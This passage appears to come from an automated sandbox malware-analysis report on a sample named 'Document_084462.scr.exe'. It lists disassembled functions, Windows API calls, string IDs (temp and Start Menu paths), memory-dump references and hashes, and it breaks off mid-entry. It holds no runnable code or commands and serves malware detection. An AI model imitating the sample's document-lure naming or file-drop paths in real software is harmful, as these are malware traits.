                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                              • API String ID: 542301482-3207577588
                                                                              • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                              • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                                                              • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                              • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                              Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                              • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                                                              • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                              • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                                                              Function 00404DB1 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                                                              • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                                                              • DeleteObject.GDI32(00000110), ref: 00404EB2
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                                                              • ShowWindow.USER32(?,00000005), ref: 00405014
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                                                              • GlobalFree.KERNEL32(?), ref: 004051F8
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00405353
                                                                              • ShowWindow.USER32(?,00000000), ref: 004053A1
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                                                              • ShowWindow.USER32(00000000), ref: 004053B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 2564846305-813528018
                                                                              • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                              • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                                                              • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                              • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                                                              Function 00404503 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045A1
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045D2
                                                                              • GetSysColor.USER32(?), ref: 004045E3
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                                                              • lstrlenW.KERNEL32(?), ref: 00404604
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                                                              • SendMessageW.USER32(00000000), ref: 00404686
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                                                              • SetCursor.USER32(00000000), ref: 00404705
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                                                              • SetCursor.USER32(00000000), ref: 00404721
                                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 00404750
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: Call$N$zD@
                                                                              • API String ID: 3103080414-4182535457
                                                                              • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                              • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                                                              • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                              • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                                                              Function 0040603A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                              • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                                                              • wsprintfA.USER32 ref: 004060B9
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                                              • API String ID: 2171350718-2304911260
                                                                              • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                              • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                                                              • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                              • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                              • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                                                              • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                              • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                                              Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                              • CharNextW.USER32(?,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                              • CharPrevW.USER32(?,?,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                                                              • *?|<>/":, xrefs: 004066EF
                                                                              • "C:\Users\user\Desktop\Document_084462.scr.exe", xrefs: 0040669D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-2591860920
                                                                              • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                              • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                                                              • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                              • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                                                              Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                                                              • GetSysColor.USER32(00000000), ref: 00404406
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404412
                                                                              • SetBkMode.GDI32(?,?), ref: 0040441E
                                                                              • GetSysColor.USER32(?), ref: 00404431
                                                                              • SetBkColor.GDI32(?,?), ref: 00404441
                                                                              • DeleteObject.GDI32(?), ref: 0040445B
                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404465
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                              • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
